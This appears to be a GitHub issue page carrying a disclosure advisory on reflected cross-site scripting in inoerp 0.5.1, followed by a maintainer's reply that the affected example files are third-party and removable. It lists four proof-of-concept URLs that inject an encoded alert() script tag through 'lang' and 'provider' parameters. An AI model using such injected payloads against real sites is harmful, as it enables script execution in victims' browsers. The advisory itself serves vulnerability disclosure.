inoerp – Multiple Cross-Site Scripting (XSS)

Question

inoerp – Multiple Cross-Site Scripting (XSS)

bestshow opened this issue 8 years ago · 1 comments

Product: inoerp
Download: https://github.com/inoerp/inoERP
Vunlerable Version: 0.5.1 and probably prior
Tested Version: 0.5.1
Author: ADLab of Venustech

Advisory Details:
Multiple Cross-Site Scripting (XSS) were discovered in“inoerp 0.5.1”, which can be exploited to execute arbitrary code.
The vulnerabilities exist due to insufficient filtration of user-supplied data in the multiple HTTP GET parameters passed to several URL. An attacker could execute arbitrary HTML and script code in a browser in context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to see a pop-up messagebox:
Poc:
(1)
http://localhost/.../inoERP-master/inoerp/locale/examples/pigs_dropin.php?lang=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(2)
http://localhost/.../inoERP-master/inoerp/locale/examples/pigs_fallback.php?lang=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(3)
http://localhost/.../inoERP-master/inoerp/tparty/extensions/social_login/hybridauth/examples/social_hub/includes/menu.php?provider=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(4)
http://localhost/.../inoERP-master/inoerp/tparty/extensions/social_login/hybridauth_old/examples/social_hub/includes/menu.php?provider=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22

Answer 1 · 2017-03-01T15:38:32.000Z

Hi bestshow,

All the products you have mentioned locale/hybridauth are third party applications and not developed by inoERP.
You don't need to use any third party application to use inoERP. You can just remove them from your application